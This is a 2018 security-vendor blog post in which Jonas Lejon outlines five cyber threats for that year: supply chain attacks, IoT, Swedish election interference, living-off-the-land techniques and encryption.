Free trial Request quote Contact me
14March
Five Cyber threats you should look out for 2018
We face many challenges in 2018. New laws, elections, expansion of the IoT, etc. Our security expert Jonas Lejon outlnes the cyber threats you should look out for 2018.
By Jonas Lejon Topics: IoT, Trends

Attacks on supply chains

In 2017 we saw most vendors getting hacked, with legitimate code changed to contain backdoors or other types of unwanted behaviour. In several cases, the modified code was even cryptographically signed with the company’s certificate.

This type of attack where dependencies on our suppliers are exploited is probably just the tip of the iceberg. CloudHopper was not particularly advanced but it was effective in exploiting people by getting administrators to click on attachments containing malicious code.

When did you last look to see whether your computer or server might contain a hardware backdoor put there during delivery from the manufacturer? Are binaries automatically updated from your provider?

2. IoT - connected devices and critical infrastructure

As digitalisation spreads and more and more products and systems are connected, the ability of a malicious operator to influence these connected devices is also increasing. This can range from a connected refrigerator to critical systems that can be indirectly affected by cyber attacks against locks, electrical supplies, telephony etc.

3. The election

Most people will be aware that there is a general election in Sweden this year. With more and more alternative news sources and ‘fake news’, cyber attacks will be one of several channels for reinforcing a narrative. We will probably see information thefts where the content can be used to strengthen or weaken a party at a strategic time.

4. ‘Living off the land’

Why should the attacker introduce new binaries or malware into a system when it is possible to exploit existing functionality to create backdoors or e.g. filter information? ‘Living off the land’ is a concept whereby the attacker can use things that are already installed in the basic Windows system. As more and more users use whitelisting, this becomes a way for the attacker to bypass the whitelists and avoid triggering antivirus software.

5. Encryption

Within the crypto area, we will see an increase in systems utilising encryption and end-to-end processes. But attackers too are getting better at exploiting cryptographic functions and making it harder for us to investigate malware.

With homomorphic systems such as attribute-based encryption and searchable encryption, storing information in cloud services will be more secure without the cloud service provider being able to view the content.

Conclusion

 Organisations need to get better at practising and displaying risk-awareness. This applies not only to management teams but to the entire organisation. What do you do when the ‘shit hits the fan’ (if you’ll pardon the expression). Not only because you have to have an action plan for the GDPR, NIS and other laws that are coming, but because it is only a matter of time before something happens and you are forced to act. So make it easier for yourself - allocate one day per year for different types of exercise.

About the author
Jonas who sitts in Holm Security's advisory board, has worked for more than 10 years at FRA and the Armed Forces. Jonas runs Sweden's largest blog in IT security, kryptera.se.

Jonas Lejon
jonas@triop.se